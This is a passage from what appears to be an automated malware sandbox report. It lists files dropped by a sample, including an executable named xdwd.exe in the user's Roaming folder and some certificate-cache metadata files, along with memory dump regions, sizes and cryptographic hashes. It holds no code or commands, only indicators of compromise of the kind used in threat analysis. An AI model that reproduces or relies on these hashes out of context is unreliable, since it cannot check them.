                                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\xdwd.exe

                                                                                                                                                      Filesize

                                                                                                                                                      5.2MB

                                                                                                                                                      MD5

                                                                                                                                                      adc76054a5b22974290b540fca4adf19

                                                                                                                                                      SHA1

                                                                                                                                                      a39741c3946cda5caae31ca9711cadd64720bbe5

                                                                                                                                                      SHA256

                                                                                                                                                      b036f0b4078be1866cbba1b3a4d1098629668e8ce4bd0167c308f00b7d86adb7

                                                                                                                                                      SHA512

                                                                                                                                                      0369bee44ce5fe7c077af194fd7200e7b413cd807d8c529a69031705ada18572d808e46222aaf557110a86ab65ca437670e5ea3168d8dcac0c4222ae301be631

                                                                                                                                                    • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                      Filesize

                                                                                                                                                      328B

                                                                                                                                                      MD5

                                                                                                                                                      00229ead74fc52d06ed7e3ccff44ecc6

                                                                                                                                                      SHA1

                                                                                                                                                      a8492589b5cf8e8d92c6f3227c742712ca09cc63

                                                                                                                                                      SHA256

                                                                                                                                                      6f60ac405f458595671a7032a65bbe72945b215799dfd474b98e30fc5d24d596

                                                                                                                                                      SHA512

                                                                                                                                                      aeeb423e055a178f6a91bbc68cbbd485323fdcb7dfdc4d3fd4978aa3204a5120f9b6677034f1bcacd3f11008bd631bfdb9497acfb8ba45a910257364c3bf6b01

                                                                                                                                                    • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                                                      Filesize

                                                                                                                                                      330B

                                                                                                                                                      MD5

                                                                                                                                                      58d6ada6b3b7cd48375faf70a2c3a9e8

                                                                                                                                                      SHA1

                                                                                                                                                      a15b17e4c3e2bf33abe71d0ef1b126637d6b18cf

                                                                                                                                                      SHA256

                                                                                                                                                      aff59d2b1dd3aca45b9d68e85d10d7ab9c91b88e01236032eb05c962a9ebcb4b

                                                                                                                                                      SHA512

                                                                                                                                                      a974569d5c1936384b93d8f50dc5cd392846070fb8d8ee6b02bcc786af603ef1f987c6f502f5667cb543f96568966b23fe849bcc10b1fa79ea641c5f7cc815c8

                                                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

                                                                                                                                                      Filesize

                                                                                                                                                      412B

                                                                                                                                                      MD5

                                                                                                                                                      7a07ea8c0fc2d09152640c412e372d83

                                                                                                                                                      SHA1

                                                                                                                                                      c5da67e5ee63b613fbd346f570759d524dac6265

                                                                                                                                                      SHA256

                                                                                                                                                      dddd0fee798fdc21c228efbd9c74dbae640dc0c0255c903355147134efbc54f5

                                                                                                                                                      SHA512

                                                                                                                                                      6294455b9121c73b76fef8a5e7feec2e8e74388da872095a22f4e4fa6cf3ca7fabf41855bd649f179571053ff7bcffd1fcd799dd1e8f1fbd0096468ef0e82700

                                                                                                                                                    • memory/408-95-0x00007FFBE22F0000-0x00007FFBE2300000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/408-94-0x000002196F3A0000-0x000002196F3CB000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/628-61-0x0000017E316A0000-0x0000017E316C4000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      144KB

                                                                                                                                                    • memory/628-63-0x00007FFBE22F0000-0x00007FFBE2300000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/628-62-0x0000017E316D0000-0x0000017E316FB000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/692-68-0x00007FFBE22F0000-0x00007FFBE2300000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/692-67-0x0000017CF0800000-0x0000017CF082B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/712-97-0x000002D9D4E00000-0x000002D9D4E2B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/712-98-0x00007FFBE22F0000-0x00007FFBE2300000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/972-70-0x000001CC0F9C0000-0x000001CC0F9EB000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/972-71-0x00007FFBE22F0000-0x00007FFBE2300000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/992-100-0x0000024DC09D0000-0x0000024DC09FB000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/992-101-0x00007FFBE22F0000-0x00007FFBE2300000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/1028-104-0x00007FFBE22F0000-0x00007FFBE2300000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/1028-103-0x000001B536AB0000-0x000001B536ADB000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/1056-107-0x00007FFBE22F0000-0x00007FFBE2300000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/1056-106-0x0000027FA4180000-0x0000027FA41AB000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/1088-88-0x0000021702080000-0x00000217020AB000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/1088-89-0x00007FFBE22F0000-0x00007FFBE2300000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/1124-109-0x0000015B42260000-0x0000015B4228B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/1124-110-0x00007FFBE22F0000-0x00007FFBE2300000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/1180-113-0x00007FFBE22F0000-0x00007FFBE2300000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/1180-112-0x00000238AFE90000-0x00000238AFEBB000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/1312-115-0x000001C05FB30000-0x000001C05FB5B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/1312-116-0x00007FFBE22F0000-0x00007FFBE2300000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/1396-122-0x000001643CBB0000-0x000001643CBDB000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/1664-1-0x0000000000580000-0x0000000000588000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                    • memory/1664-0-0x00007FFC03DE3000-0x00007FFC03DE5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/1668-13-0x00007FFC03DE0000-0x00007FFC048A2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/1668-17-0x00007FFC03DE0000-0x00007FFC048A2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/1668-16-0x00007FFC03DE0000-0x00007FFC048A2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/1668-15-0x00007FFC03DE0000-0x00007FFC048A2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/1668-14-0x00007FFC03DE0000-0x00007FFC048A2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/1668-34-0x00007FFC03DE0000-0x00007FFC048A2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/1668-8-0x00000231C4F30000-0x00000231C4F52000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                    • memory/3148-49-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/3148-47-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/3148-50-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/3148-52-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/3148-54-0x00007FFC20B70000-0x00007FFC20C2D000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      756KB

                                                                                                                                                    • memory/3148-58-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/3148-53-0x00007FFC22270000-0x00007FFC22468000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                    • memory/3148-48-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/4740-365-0x0000018FCFF90000-0x0000018FCFFAC000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      112KB

                                                                                                                                                    • memory/4740-366-0x0000018FCFFB0000-0x0000018FD0065000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      724KB

                                                                                                                                                    • memory/4740-367-0x0000018FD0070000-0x0000018FD007A000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      40KB